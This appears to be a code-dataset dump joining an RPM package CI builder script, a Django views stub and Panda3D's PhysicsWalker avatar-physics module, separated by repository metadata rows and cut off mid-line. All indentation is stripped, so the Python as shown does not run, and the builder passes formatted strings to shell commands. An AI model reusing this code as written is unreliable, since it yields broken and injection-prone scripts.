echo('green', 'info:', ' Load cache from {} file.'.format(cacheFile))
with open(cacheFile, 'r') as f:
global repocache
repocache = json.loads(f.read())
return specFile, repocache[specFile]
items = lambda t, c: re.findall('%s:\s+(.*)'%t, c)
split_str = lambda l: [re.split('[\s,=|>=|<=]+', i) for i in l]
flat = lambda L: sum(map(flat, L), []) if isinstance(L, list) else [L]
remove_ver = lambda l: [i for i in l if not re.match('^[0-9]', i)]
decode = lambda v: v.decode() if v else v
if os.path.exists(specFile) and specFile.endswith('.spec'):
rpm_info = {}
subpkgs, reqpkgs = [], []
spec = rpm.spec(specFile)
hdr = spec.sourceHeader
reqlist = [decode(i) for i in hdr[rpm.RPMTAG_REQUIRES]]
content = getoutput('/bin/rpmspec -P {}'.format(specFile))
content = content[:content.index('%changelog')]
# subpackages
name = decode(hdr[rpm.RPMTAG_NAME])
subpkgs.append(name)
if re.search('%package', content):
for i in re.findall('%package\s*(.+)', content):
if i.startswith('-n'):
subpkgs.append(re.match('-n\s*(.*)', i).group(1))
else:
subpkgs.append('{}-{}'.format(name, i))
provpkgs = remove_ver(flat(split_str(items('Provides', content)))) + subpkgs
# parse buildrequires
for i in reqlist:
if re.match('.*\((.*)\)', i):
if len(query_package(i)) > 0:
reqpkgs.append(query_package(i)[0][0].name)
else:
reqpkgs.append(i)
rpm_info = {
"name": decode(hdr[rpm.RPMTAG_NAME]),
"epoch": hdr[rpm.RPMTAG_EPOCHNUM],
"version": decode(hdr[rpm.RPMTAG_VERSION]),
"release": decode(hdr[rpm.RPMTAG_RELEASE]),
"vendor": decode(hdr[rpm.RPMTAG_VENDOR]),
"summary": decode(hdr[rpm.RPMTAG_SUMMARY]),
"packager": decode(hdr[rpm.RPMTAG_PACKAGER]),
"group": decode(hdr[rpm.RPMTAG_GROUP]),
"license": decode(hdr[rpm.RPMTAG_LICENSE]),
"url": decode(hdr[rpm.RPMTAG_URL]),
"description": decode(hdr[rpm.RPMTAG_DESCRIPTION]),
"sources": spec.sources,
"patchs": [decode(i) for i in hdr[rpm.RPMTAG_PATCH]],
"build_archs": [decode(i) for i in hdr[rpm.RPMTAG_BUILDARCHS]],
"exclusive_archs": [decode(i) for i in hdr[rpm.RPMTAG_EXCLUSIVEARCH]],
#"build_requires": [i.DNEVR()[2:] for i in rpm.ds(hdr, 'requires')],
"build_requires": sorted(list(set(reqpkgs))),
"requires": remove_ver(flat(split_str(items('\nRequires', content)))),
"recommends": remove_ver(flat(split_str(items('Recommends', content)))),
"supplements": [decode(i) for i in hdr[rpm.RPMTAG_SUPPLEMENTS]],
"suggests": [decode(i) for i in hdr[rpm.RPMTAG_SUGGESTS]],
"enhances": [decode(i) for i in hdr[rpm.RPMTAG_ENHANCES]],
"provides": sorted(list(set(provpkgs))),
"obsoletes": remove_ver(flat(split_str(items('Obsoletes', content)))),
"conflicts": remove_ver(flat(split_str(items('Conflicts', content))))
}
return specFile, rpm_info
return False
def get_sources(itemList, output=srcDir, verb=None):
'''Get source files from local and internet.
Args:
itemList: A list of source files.
output: A string of temp directory.
verb: A bool of verbose.
'''
for item in itemList:
if not os.path.exists(os.path.join(output, item[0].split('/')[-1])):
if item[0].split('://')[0] in ['http', 'https', 'ftp']:
if verb:
echo('cyan', 'verb:', ' downloading {} file.'.format(item[0]))
try:
urlretrieve(item[0], '{}/{}'.format(output, item[0].split('/')[-1]))
#call(['wget', '-q', '-P', output, item[0]])
except Exception as e:
echo('red', 'erro:', ' downloading error. {}'.format(e))
sys.exit(1)
else:
for src in find_files(item[0], 'rpms'):
if verb:
echo('cyan', 'verb:', ' copy {} file to build directory.'.format(src))
shutil.copy(src, output)
def find_files(pattern, path=os.getcwd()):
'''Search specify file.
Args:
pattern: Filename regular expression.
path: Search path.
Yields:
Returns the target path of the file generator.
'''
for root, dirs, files in os.walk(path):
for filename in fnmatch.filter(files, pattern):
yield os.path.join(root, filename)
def build_srpm(specFile, output='build'):
'''Build source rpm.
Args:
specFile: A string of the Spec filename.
output: A string of the SRPM file output directory.
Returns:
Return the SRPM filename.
'''
command = '/bin/rpmbuild ' \
'-D "_topdir ." ' \
'-D "_builddir {out}" ' \
'-D "_buildrootdir {out}" ' \
'-D "_rpmdir {out}" ' \
'-D "_sourcedir {out}" ' \
'-D "_specdir {out}" ' \
'-D "_srcrpmdir {out}" ' \
'-bs {}'.format(specFile, out=output)
return re.search('build.*', getoutput(command)).group()
def build_rpm(srpmFile, release='23', arch='x86_64', output=outDir, opts='',
verb=None, quiet=None):
'''Build rpm.
Args:
srpmFile: A string of SRPM file path.
release: A string of system release version.
arch: A string of system architecture.
output: A string of RPM file output directory.
opts: A string of mock options.
verb: A bool of verbose.
quiet: A bool of quiet.
Returns:
Return the command running log.
'''
if verb:
opts += ' --verbose'
elif quiet:
opts += ' --quiet'
command = '/bin/mock --resultdir={} --root=fedora-{}-{}-rpmfusion_free {} {}'.format(
output, release, arch, opts, srpmFile)
return getstatusoutput(command)
def rpm_lint(repoDir=outDir, time=10, verb=None):
'''Check rpm files.
Args:
repoDir: A string of repository directory.
time: A integer of time(minutes).
verb: A bool of verbose.
Returns:
Return the check result.
'''
opts = '--info' if verb else ''
command = '/bin/find {} -name "*.rpm" -and -ctime -{} | xargs ' \
'/bin/rpmlint {}'.format(repoDir, round(time/60/24, 4), opts)
return getoutput(command)
def create_repo(output=outDir, verb=None, quiet=None):
'''Creates metadata of rpm repository.
Args:
output: A string of RPM metadata output directory.
verb: A bool of verbose.
quiet: A bool of quiet.
Returns:
Return the command running log.
'''
opts = ''
if verb:
opts += ' --verbose'
elif quiet:
opts += ' --quiet'
return getoutput('/bin/createrepo_c {} -d -x *.src.rpm {}'.format(opts, output))
def result(filename, content):
'''Log build result to file.
Args:
filename: A string of filename.
content: A string of content.
'''
result = 'success' if content[0] == 0 else 'fail'
_, pkgname, release, arch = content
if filename == '-':
_pkgname = re.match('.*/(.*-[0-9]{1,2}).*', pkgname).group(1)
pkgname = _pkgname + '.net' if re.match('.*\.net', pkgname) else _pkgname
return pkgname.ljust(35), \
'fc{}-{}'.format(release, arch).ljust(13), \
result
else:
with open(filename, mode='a+') as f:
f.write('{} fc{}-{} {}\n'.format(pkgname, release, arch, result))
echo('green', 'info:', ' Write build result to {} file.'.format(filename))
def parse_args():
'''Parser for command-line options.
Returns:
Return the Namespace object.
'''
parser = argparse.ArgumentParser(description='repository ci builder.')
parser.add_argument('-o', '--output-dir', metavar='PATH', type=str,
dest='outDir', action='store', default=outDir,
help='set rpm package output directory (default: output)')
parser.add_argument('-c', '--commit', metavar='COMMIT', type=str,
dest='commit', action='store', required=False,
help='build the specified commit')
parser.add_argument('-f', '--file', metavar='FILE', type=str,
dest='file', action='append', default=[], required=False,
help='build the specified Spec file')
parser.add_argument('-a', '--arch', metavar='ARCH', type=str,
dest='archs', action='append', required=False,
help='set architecture for build rpm package (default: x86_64, i386)')
parser.add_argument('-r', '--release', metavar='RELEASE', type=str,
dest='releases', action='append', required=False,
help='set release version for build rpm package (default: 22, 23, 24)')
parser.add_argument('-b', '--black-list', metavar='BLACKLIST', type=str,
dest='blacklist', action='append', required=False,
help='set blacklist, skip these items')
parser.add_argument('--mock-opts', metavar='OPTIONS', type=str,
dest='mock', action='store', default='', required=False,
help='set mock command-line options')
parser.add_argument('--createrepo', dest='createrepo', action='store_true',
help='run createrepo to create repository')
parser.add_argument('--rpmlint', dest='rpmlint', action='store_true',
help='check common problems in rpm package')
parser.add_argument('--clean', dest='clean', action='store_true',
help='clean workspace before building')
parser.add_argument('--cache', dest='cache', action='store_true',
help='create metadata cache')
parser.add_argument('--result', metavar='PATH', type=str,
dest='result', action='store', required=False, default='result.log',
help='log bulid result to file (default: result.log)')
parser.add_argument('-v', '--verbose', dest='verbose', action='store_true',
help='be verbose')
parser.add_argument('-q', '--quiet', dest='quiet', action='store_true',
help='be quiet')
parser.add_argument(dest='files', metavar='FILE', type=str, action='store', nargs='*')
return parser.parse_args()
def echo(color=None, *args):
'''Output log with color.
Args:
color: A string of color.
*args: A tuple that include multi content parameters.
'''
if args:
msg1, msg2 = args[0], ' '.join(args[1:])
else:
msg1, msg2 = color, ''
if color == 'red':
print('\033[31m{}\033[0m{}'.format(msg1, msg2))
elif color == 'green':
print('\033[32m{}\033[0m{}'.format(msg1, msg2))
elif color == 'yellow':
print('\033[33m{}\033[0m{}'.format(msg1, msg2))
elif color == 'blue':
print('\033[34m{}\033[0m{}'.format(msg1, msg2))
elif color == 'cyan':
print('\033[36m{}\033[0m{}'.format(msg1, msg2))
elif color and args:
print('{} {} {}'.format(color, msg1, msg2))
else:
print('{}'.format(msg1))
def resolve_depends(pkglist, depdict, verb=None):
'''Resolve dependencies.
Args:
pkglist: A list of pkgname.
depdict: The dict contains the buildrequires, provides and srpm path.
verb: A bool of verbose.
Returns:
Return the list contains the srpm path.
'''
_tasks, _specs = [], []
tasks, specs = [], []
for pkg in pkglist:
score = 0
for dep in depdict[pkg][0]:
for pkg2 in pkglist:
if pkg == pkg2:
continue
if dep in depdict[pkg2][1]:
score += 1
_tasks.append({'pkg': depdict[pkg][2], 'score': score})
_specs.append({'spec': depdict[pkg][3], 'score': score})
tasks_by_score = sorted(_tasks, key=itemgetter('score'))
specs_by_score = sorted(_specs, key=itemgetter('score'))
for i in tasks_by_score:
tasks.append(i['pkg'])
for i in specs_by_score:
specs.append(i['spec'])
echo('green', 'info:', ' Resolve dependencies.')
if verb:
echo('cyan', 'verb:', ' build task {}.'.format(tasks))
return tasks, specs
def repo_cache(output=None, verb=None):
'''Create repository cache.
Args:
output: A string of output filename.
verb: A bool of verbose.
'''
cacheDict = {}
for i in find_files('*.spec', 'rpms'):
if verb:
echo('cyan', 'verb:', ' cached {} file.'.format(i))
specFile, specDict = parse_spec(i)
cacheDict.update({specFile: specDict})
with open(output, 'w') as f:
json.dump(cacheDict, f)
def send_comment(content):
'''Send comment to Github.
Args:
content: A string of comments.
Returns:
Return json response from Github API.
'''
pr_url = 'https://api.github.com/repos/FZUG/repo/issues/%s/comments'
pr_num = os.getenv('ghprbPullId')
pr_token = os.getenv('PR_TOKEN')
session = requests.session()
session.headers['Authorization'] = 'token %s' % pr_token
comment = json.dumps({"body": content})
resp = session.post(pr_url % pr_num, data=comment)
return resp.json()
if __name__ == '__main__':
args = parse_args()
Archs = args.archs if args.archs else ['x86_64', 'i386']
Releases = args.releases if args.releases else ['24', '25']
blackList = args.blacklist if args.blacklist else ['electron']
args.file += args.files
if args.cache:
cacheFile = '.repocache.json'
if os.path.exists(cacheFile):
echo('green', 'info:', ' The repo cache exists.')
else:
echo('green', 'info:', ' Create repo cache.')
repo_cache(cacheFile, args.verbose)
sys.exit()
if not sys.stdin.isatty():
args.file += sys.stdin.read().split()
rootDir = args.outDir
if 'REPO_ROOT' in os.environ:
rootDir = os.environ['REPO_ROOT']
mode = 'manual'
if 'GIT_PREVIOUS_COMMIT' in os.environ or 'ghprbActualCommit' in os.environ:
mode = 'ci'
echo('green', 'info:', ' Running as {} mode.'.format(mode))
if args.clean:
if args.verbose:
echo('cyan', 'verb:', ' clean workspace.')
getoutput('/bin/git clean -f -d -x')
if not os.path.isdir(srcDir):
os.mkdir(srcDir)
results = []
if os.path.exists(args.result):
if args.verbose:
echo('cyan', 'verb:', ' load build result from {} file.'.format(args.result))
with open(args.result) as f:
results = re.findall('rpms/.*.spec', f.read())
deps = {}
resultList, pkgs = [], []
for commit in get_commit_list():
commit = args.commit if args.commit else commit
fileList = args.file if args.file else get_file_list(commit)
for filePath in fileList:
if mode == 'manual' and filePath in results:
if args.verbose:
echo('cyan', 'verb:', ' skip {} file.'.format(filePath))
continue
if parse_spec(filePath):
specFile, specDict = parse_spec(filePath)
if args.verbose:
echo('cyan', 'verb:', ' parser {} file.'.format(specFile))
elif mode == 'ci':
echo('green', 'info:', 'Unmodified spec file in commit.')
continue
else:
echo('green', 'info:', 'Unmodified spec file in commit.')
sys.exit()
get_sources(specDict['sources'], verb=args.verbose)
srpmFile = build_srpm(specFile)
echo('green', 'info:', ' Build SRPM -', srpmFile)
if re.match('.*\.net', srpmFile):
key = specDict['name'] + '.net'
else:
key = specDict['name']
# queue
pkgs.append(key)
deps.update({key: [specDict['build_requires'], specDict['provides'], srpmFile, specFile],})
if args.file or args.commit:
break
tasks, specs = resolve_depends(pkgs, deps, verb=args.verbose)
for task in tasks:
for rel in Releases:
for arch in Archs:
outDir = os.path.join(rootDir, rel, arch)
echo('green', 'info:', ' Build RPM {} for fc{} - {}:'.format(task, rel, arch))
value, log = build_rpm(task, release=rel, arch=arch, output=outDir,
opts=args.mock, verb=args.verbose, quiet=args.quiet)
echo(log)
if args.createrepo:
echo('green', 'info:', ' Create metadata for fc{} - {}:\n'.format(rel, arch),
create_repo(outDir, verb=args.verbose, quiet=args.quiet))
if args.rpmlint:
echo('green', 'info:', ' Check RPM {} for fc{} - {}:\n'.format(task, rel, arch),
rpm_lint(outDir, verb=args.verbose))
if mode == 'manual':
result(args.result, [value, specs[tasks.index(task)], rel, arch])
resultList.append(result('-', [value, task, rel, arch]))
build_result = '** Build result **\n'
echo('cyan', '\n** Build result **')
for i in resultList:
build_result += '%s\n' % ''.join(i)
echo(''.join(i))
# Sent build result
if os.getenv('ghprbActualCommit') and send_comment(build_result).get('id'):
echo('green', 'info:', 'Comment sent successfully.')
|
695df71a36d761836d37f05011181ccb2e743fb5
|
6dfc23ef65e5943712340ef2b4b648cc25ea1fad
|
/2021/07/27/The First Thing You Should Do at the Start of a New Django Project/djangodemo/myproject/myapp/views.py
|
8c278d47420c5ff2a5712e6701fdb8343bfa44aa
|
[
"Unlicense"
] |
permissive
|
PrettyPrinted/youtube_video_code
|
6d265c910de18d780cdb99f7ea11b8b963929dc2
|
5654e5feba854d3b41b8dd75218e0221408e7831
|
refs/heads/master
| 2023-09-04T21:28:57.386174
| 2023-08-11T07:07:45
| 2023-08-11T07:07:45
| 186,743,986
| 698
| 2,347
|
Unlicense
| 2022-10-06T04:06:56
| 2019-05-15T03:40:45
|
HTML
|
UTF-8
|
Python
| false
| false
| 137
|
py
|
views.py
|
from django.shortcuts import render
from django.contrib.auth import get_user_model
User = get_user_model()
# Create your views here.
|
4f39f2205e645e5949b48843fe2c187de7b4bc83
|
c7c73566784a7896100e993606e1bd8fdd0ea94e
|
/direct/src/controls/PhysicsWalker.py
|
4575856922d0a6d11735a93a9569a6f613a2924d
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
panda3d/panda3d
|
c3f94df2206ff7cfe4a3b370777a56fb11a07926
|
160ba090a5e80068f61f34fc3d6f49dbb6ad52c5
|
refs/heads/master
| 2023-08-21T13:23:16.904756
| 2021-04-11T22:55:33
| 2023-08-06T06:09:32
| 13,212,165
| 4,417
| 1,072
|
NOASSERTION
| 2023-09-09T19:26:14
| 2013-09-30T10:20:25
|
C++
|
UTF-8
|
Python
| false
| false
| 29,452
|
py
|
PhysicsWalker.py
|
"""
PhysicsWalker.py is for avatars.
A walker control such as this one provides:
- creation of the collision nodes
- handling the keyboard and mouse input for avatar movement
- moving the avatar
it does not:
- play sounds
- play animations
although it does send messages that allow a listener to play sounds or
animations based on walker events.
"""
from direct.directnotify import DirectNotifyGlobal
from direct.showbase import DirectObject
from direct.controls.ControlManager import CollisionHandlerRayStart
from direct.showbase.InputStateGlobal import inputState
from direct.showbase.MessengerGlobal import messenger
from direct.task.Task import Task
from direct.task.TaskManagerGlobal import taskMgr
from direct.extensions_native import Mat3_extensions # pylint: disable=unused-import
from direct.extensions_native import VBase3_extensions # pylint: disable=unused-import
from direct.extensions_native import VBase4_extensions # pylint: disable=unused-import
from panda3d.core import (
BitMask32,
ClockObject,
CollisionHandlerFloor,
CollisionHandlerQueue,
CollisionNode,
CollisionRay,
CollisionSphere,
CollisionTraverser,
ConfigVariableBool,
LRotationf,
Mat3,
NodePath,
Point3,
Vec3,
)
from panda3d.physics import (
ActorNode,
ForceNode,
LinearEulerIntegrator,
LinearFrictionForce,
LinearVectorForce,
PhysicsCollisionHandler,
PhysicsManager,
)
import math
#import LineStream
class PhysicsWalker(DirectObject.DirectObject):
notify = DirectNotifyGlobal.directNotify.newCategory("PhysicsWalker")
wantDebugIndicator = ConfigVariableBool('want-avatar-physics-indicator', False)
useLifter = 0
useHeightRay = 0
# special methods
def __init__(self, gravity = -32.1740, standableGround=0.707,
hardLandingForce=16.0):
assert self.debugPrint(
"PhysicsWalker(gravity=%s, standableGround=%s)"%(
gravity, standableGround))
DirectObject.DirectObject.__init__(self)
self.__gravity=gravity
self.__standableGround=standableGround
self.__hardLandingForce=hardLandingForce
self.needToDeltaPos = 0
self.physVelocityIndicator=None
self.avatarControlForwardSpeed=0
self.avatarControlJumpForce=0
self.avatarControlReverseSpeed=0
self.avatarControlRotateSpeed=0
self.__oldAirborneHeight=None
self.getAirborneHeight=None
self.__oldContact=None
self.__oldPosDelta=Vec3(0)
self.__oldDt=0
self.__speed=0.0
self.__rotationSpeed=0.0
self.__slideSpeed=0.0
self.__vel=Vec3(0.0)
self.collisionsActive = 0
self.isAirborne = 0
self.highMark = 0
def setWalkSpeed(self, forward, jump, reverse, rotate):
assert self.debugPrint("setWalkSpeed()")
self.avatarControlForwardSpeed=forward
self.avatarControlJumpForce=jump
self.avatarControlReverseSpeed=reverse
self.avatarControlRotateSpeed=rotate
def getSpeeds(self):
#assert self.debugPrint("getSpeeds()")
return (self.__speed, self.__rotationSpeed)
def setAvatar(self, avatar):
self.avatar = avatar
if avatar is not None:
self.setupPhysics(avatar)
def setupRay(self, floorBitmask, floorOffset):
# This is a ray cast from your head down to detect floor polygons
# A toon is about 4.0 feet high, so start it there
self.cRay = CollisionRay(0.0, 0.0, CollisionHandlerRayStart, 0.0, 0.0, -1.0)
cRayNode = CollisionNode('PW.cRayNode')
cRayNode.addSolid(self.cRay)
self.cRayNodePath = self.avatarNodePath.attachNewNode(cRayNode)
self.cRayBitMask = floorBitmask
cRayNode.setFromCollideMask(self.cRayBitMask)
cRayNode.setIntoCollideMask(BitMask32.allOff())
if self.useLifter:
# set up floor collision mechanism
self.lifter = CollisionHandlerFloor()
self.lifter.setInPattern("enter%in")
self.lifter.setOutPattern("exit%in")
self.lifter.setOffset(floorOffset)
# Limit our rate-of-fall with the lifter.
# If this is too low, we actually "fall" off steep stairs
# and float above them as we go down. I increased this
# from 8.0 to 16.0 to prevent this
#self.lifter.setMaxVelocity(16.0)
#self.bobNodePath = self.avatarNodePath.attachNewNode("bob")
#self.lifter.addCollider(self.cRayNodePath, self.cRayNodePath)
self.lifter.addCollider(self.cRayNodePath, self.avatarNodePath)
else: # useCollisionHandlerQueue
self.cRayQueue = CollisionHandlerQueue()
self.cTrav.addCollider(self.cRayNodePath, self.cRayQueue)
def determineHeight(self):
"""
returns the height of the avatar above the ground.
If there is no floor below the avatar, 0.0 is returned.
aka get airborne height.
"""
if self.useLifter:
height = self.avatarNodePath.getPos(self.cRayNodePath)
# If the shadow where not pointed strait down, we would need to
# get magnitude of the vector. Since it is strait down, we'll
# just get the z:
#spammy --> assert self.debugPrint("getAirborneHeight() returning %s"%(height.getZ(),))
assert onScreenDebug.add("height", height.getZ())
return height.getZ() - self.floorOffset
else: # useCollisionHandlerQueue
height = 0.0
#*#self.cRayTrav.traverse(render)
if self.cRayQueue.getNumEntries() != 0:
# We have a floor.
# Choose the highest of the possibly several floors we're over:
self.cRayQueue.sortEntries()
floorPoint = self.cRayQueue.getEntry(0).getFromIntersectionPoint()
height = -floorPoint.getZ()
self.cRayQueue.clearEntries()
if __debug__:
onScreenDebug.add("height", height)
return height
def setupSphere(self, bitmask, avatarRadius):
"""
Set up the collision sphere
"""
# This is a sphere on the ground to detect barrier collisions
self.avatarRadius = avatarRadius
centerHeight = avatarRadius
if self.useHeightRay:
centerHeight *= 2.0
self.cSphere = CollisionSphere(0.0, 0.0, centerHeight, avatarRadius)
cSphereNode = CollisionNode('PW.cSphereNode')
cSphereNode.addSolid(self.cSphere)
self.cSphereNodePath = self.avatarNodePath.attachNewNode(cSphereNode)
self.cSphereBitMask = bitmask
cSphereNode.setFromCollideMask(self.cSphereBitMask)
cSphereNode.setIntoCollideMask(BitMask32.allOff())
# set up collision mechanism
self.pusher = PhysicsCollisionHandler()
self.pusher.setInPattern("enter%in")
self.pusher.setOutPattern("exit%in")
self.pusher.addCollider(self.cSphereNodePath, self.avatarNodePath)
def setupPhysics(self, avatarNodePath):
assert self.debugPrint("setupPhysics()")
# Connect to Physics Manager:
self.actorNode=ActorNode("PW physicsActor")
self.actorNode.getPhysicsObject().setOriented(1)
self.actorNode.getPhysical(0).setViscosity(0.1)
physicsActor=NodePath(self.actorNode)
avatarNodePath.reparentTo(physicsActor)
avatarNodePath.assign(physicsActor)
self.phys=PhysicsManager()
fn=ForceNode("gravity")
fnp=NodePath(fn)
#fnp.reparentTo(physicsActor)
fnp.reparentTo(render)
gravity=LinearVectorForce(0.0, 0.0, self.__gravity)
fn.addForce(gravity)
self.phys.addLinearForce(gravity)
self.gravity = gravity
fn=ForceNode("priorParent")
fnp=NodePath(fn)
fnp.reparentTo(render)
priorParent=LinearVectorForce(0.0, 0.0, 0.0)
fn.addForce(priorParent)
self.phys.addLinearForce(priorParent)
self.priorParentNp = fnp
self.priorParent = priorParent
fn=ForceNode("viscosity")
fnp=NodePath(fn)
#fnp.reparentTo(physicsActor)
fnp.reparentTo(render)
self.avatarViscosity=LinearFrictionForce(0.0, 1.0, 0)
#self.avatarViscosity.setCoef(0.9)
fn.addForce(self.avatarViscosity)
self.phys.addLinearForce(self.avatarViscosity)
self.phys.attachLinearIntegrator(LinearEulerIntegrator())
self.phys.attachPhysicalNode(physicsActor.node())
self.acForce=LinearVectorForce(0.0, 0.0, 0.0)
fn=ForceNode("avatarControls")
fnp=NodePath(fn)
fnp.reparentTo(render)
fn.addForce(self.acForce)
self.phys.addLinearForce(self.acForce)
#self.phys.removeLinearForce(self.acForce)
#fnp.remove()
return avatarNodePath
def initializeCollisions(self, collisionTraverser, avatarNodePath,
wallBitmask, floorBitmask,
avatarRadius = 1.4, floorOffset = 1.0, reach = 1.0):
"""
Set up the avatar collisions
"""
assert self.debugPrint("initializeCollisions()")
assert not avatarNodePath.isEmpty()
self.cTrav = collisionTraverser
self.floorOffset = floorOffset = 7.0
self.avatarNodePath = self.setupPhysics(avatarNodePath)
if self.useHeightRay:
#self.setupRay(floorBitmask, avatarRadius)
self.setupRay(floorBitmask, 0.0)
self.setupSphere(wallBitmask|floorBitmask, avatarRadius)
self.setCollisionsActive(1)
def setAirborneHeightFunc(self, getAirborneHeight):
self.getAirborneHeight = getAirborneHeight
def setAvatarPhysicsIndicator(self, indicator):
"""
indicator is a NodePath
"""
assert self.debugPrint("setAvatarPhysicsIndicator()")
self.cSphereNodePath.show()
if indicator:
# Indicator Node:
change = render.attachNewNode("change")
#change.setPos(Vec3(1.0, 1.0, 1.0))
#change.setHpr(0.0, 0.0, 0.0)
change.setScale(0.1)
#change.setColor(Vec4(1.0, 1.0, 1.0, 1.0))
indicator.reparentTo(change)
indicatorNode = render.attachNewNode("physVelocityIndicator")
#indicatorNode.setScale(0.1)
#indicatorNode.setP(90.0)
indicatorNode.setPos(self.avatarNodePath, 0.0, 0.0, 6.0)
indicatorNode.setColor(0.0, 0.0, 1.0, 1.0)
change.reparentTo(indicatorNode)
self.physVelocityIndicator=indicatorNode
# Contact Node:
contactIndicatorNode = render.attachNewNode("physContactIndicator")
contactIndicatorNode.setScale(0.25)
contactIndicatorNode.setP(90.0)
contactIndicatorNode.setPos(self.avatarNodePath, 0.0, 0.0, 5.0)
contactIndicatorNode.setColor(1.0, 0.0, 0.0, 1.0)
indicator.instanceTo(contactIndicatorNode)
self.physContactIndicator=contactIndicatorNode
else:
print("failed load of physics indicator")
def avatarPhysicsIndicator(self, task):
#assert self.debugPrint("avatarPhysicsIndicator()")
# Velocity:
self.physVelocityIndicator.setPos(self.avatarNodePath, 0.0, 0.0, 6.0)
physObject=self.actorNode.getPhysicsObject()
a=physObject.getVelocity()
self.physVelocityIndicator.setScale(math.sqrt(a.length()))
a+=self.physVelocityIndicator.getPos()
self.physVelocityIndicator.lookAt(Point3(a))
# Contact:
contact=self.actorNode.getContactVector()
if contact==Vec3.zero():
self.physContactIndicator.hide()
else:
self.physContactIndicator.show()
self.physContactIndicator.setPos(self.avatarNodePath, 0.0, 0.0, 5.0)
#contact=self.actorNode.getContactVector()
point=Point3(contact+self.physContactIndicator.getPos())
self.physContactIndicator.lookAt(point)
return Task.cont
def deleteCollisions(self):
assert self.debugPrint("deleteCollisions()")
del self.cTrav
if self.useHeightRay:
del self.cRayQueue
self.cRayNodePath.removeNode()
del self.cRayNodePath
del self.cSphere
self.cSphereNodePath.removeNode()
del self.cSphereNodePath
del self.pusher
del self.getAirborneHeight
def setCollisionsActive(self, active = 1):
assert self.debugPrint("collisionsActive(active=%s)"%(active,))
if self.collisionsActive != active:
self.collisionsActive = active
if active:
self.cTrav.addCollider(self.cSphereNodePath, self.pusher)
if self.useHeightRay:
if self.useLifter:
self.cTrav.addCollider(self.cRayNodePath, self.lifter)
else:
self.cTrav.addCollider(self.cRayNodePath, self.cRayQueue)
else:
self.cTrav.removeCollider(self.cSphereNodePath)
if self.useHeightRay:
self.cTrav.removeCollider(self.cRayNodePath)
# Now that we have disabled collisions, make one more pass
# right now to ensure we aren't standing in a wall.
self.oneTimeCollide()
def getCollisionsActive(self):
assert self.debugPrint(
"getCollisionsActive() returning=%s"%(
self.collisionsActive,))
return self.collisionsActive
def placeOnFloor(self):
"""
Make a reasonable effort to place the avatar on the ground.
For example, this is useful when switching away from the
current walker.
"""
self.oneTimeCollide()
self.avatarNodePath.setZ(self.avatarNodePath.getZ()-self.getAirborneHeight())
def oneTimeCollide(self):
"""
Makes one quick collision pass for the avatar, for instance as
a one-time straighten-things-up operation after collisions
have been disabled.
"""
assert self.debugPrint("oneTimeCollide()")
tempCTrav = CollisionTraverser("oneTimeCollide")
if self.useHeightRay:
if self.useLifter:
tempCTrav.addCollider(self.cRayNodePath, self.lifter)
else:
tempCTrav.addCollider(self.cRayNodePath, self.cRayQueue)
tempCTrav.traverse(render)
def addBlastForce(self, vector):
pass
def displayDebugInfo(self):
"""
For debug use.
"""
onScreenDebug.add("w controls", "PhysicsWalker")
if self.useLifter:
onScreenDebug.add("w airborneHeight", self.lifter.getAirborneHeight())
onScreenDebug.add("w isOnGround", self.lifter.isOnGround())
#onScreenDebug.add("w gravity", self.lifter.getGravity())
onScreenDebug.add("w contact normal", self.lifter.getContactNormal().pPrintValues())
onScreenDebug.add("w impact", self.lifter.getImpactVelocity())
onScreenDebug.add("w velocity", self.lifter.getVelocity())
onScreenDebug.add("w hasContact", self.lifter.hasContact())
#onScreenDebug.add("w falling", self.falling)
#onScreenDebug.add("w jumpForce", self.avatarControlJumpForce)
#onScreenDebug.add("w mayJump", self.mayJump)
onScreenDebug.add("w isAirborne", self.isAirborne)
def handleAvatarControls(self, task):
"""
Check on the arrow keys and update the avatar.
"""
if __debug__:
if self.wantDebugIndicator:
onScreenDebug.append("localAvatar pos = %s\n"%(base.localAvatar.getPos().pPrintValues(),))
onScreenDebug.append("localAvatar h = % 10.4f\n"%(base.localAvatar.getH(),))
onScreenDebug.append("localAvatar anim = %s\n"%(base.localAvatar.animFSM.getCurrentState().getName(),))
#assert self.debugPrint("handleAvatarControls(task=%s)"%(task,))
physObject=self.actorNode.getPhysicsObject()
#rotAvatarToPhys=Mat3.rotateMatNormaxis(-self.avatarNodePath.getH(), Vec3.up())
#rotPhysToAvatar=Mat3.rotateMatNormaxis(self.avatarNodePath.getH(), Vec3.up())
contact=self.actorNode.getContactVector()
# hack fix for falling through the floor:
if contact==Vec3.zero() and self.avatarNodePath.getZ()<-50.0:
# DCR: don't reset X and Y; allow player to move
self.reset()
self.avatarNodePath.setZ(50.0)
messenger.send("walkerIsOutOfWorld", [self.avatarNodePath])
if self.wantDebugIndicator:
self.displayDebugInfo()
# get the button states:
forward = inputState.isSet("forward")
reverse = inputState.isSet("reverse")
turnLeft = inputState.isSet("turnLeft")
turnRight = inputState.isSet("turnRight")
slide = 0#inputState.isSet("slide")
slideLeft = 0#inputState.isSet("slideLeft")
slideRight = 0#inputState.isSet("slideRight")
jump = inputState.isSet("jump")
# Check for Auto-Run
if base.localAvatar.getAutoRun():
forward = 1
reverse = 0
# Determine what the speeds are based on the buttons:
self.__speed=(forward and self.avatarControlForwardSpeed or
reverse and -self.avatarControlReverseSpeed)
avatarSlideSpeed=self.avatarControlForwardSpeed*0.5
#self.__slideSpeed=slide and (
# (turnLeft and -avatarSlideSpeed) or
# (turnRight and avatarSlideSpeed))
self.__slideSpeed=(
(slideLeft and -avatarSlideSpeed) or
(slideRight and avatarSlideSpeed))
self.__rotationSpeed=not slide and (
(turnLeft and self.avatarControlRotateSpeed) or
(turnRight and -self.avatarControlRotateSpeed))
# How far did we move based on the amount of time elapsed?
dt=ClockObject.getGlobalClock().getDt()
if self.needToDeltaPos:
self.setPriorParentVector()
self.needToDeltaPos = 0
#self.__oldPosDelta = render.getRelativeVector(
# self.avatarNodePath,
# self.avatarNodePath.getPosDelta(render))
#self.__oldPosDelta = self.avatarNodePath.getRelativeVector(
# render,
# self.avatarNodePath.getPosDelta(render))
self.__oldPosDelta = self.avatarNodePath.getPosDelta(render)
self.__oldDt = dt
#posDelta = self.avatarNodePath.getPosDelta(render)
#if posDelta==Vec3.zero():
# self.priorParent.setVector(self.__oldPosDelta)
#else:
# self.priorParent.setVector(Vec3.zero())
# # We must copy the vector to preserve it:
# self.__oldPosDelta=Vec3(posDelta)
if __debug__:
if self.wantDebugIndicator:
onScreenDebug.add("posDelta1",
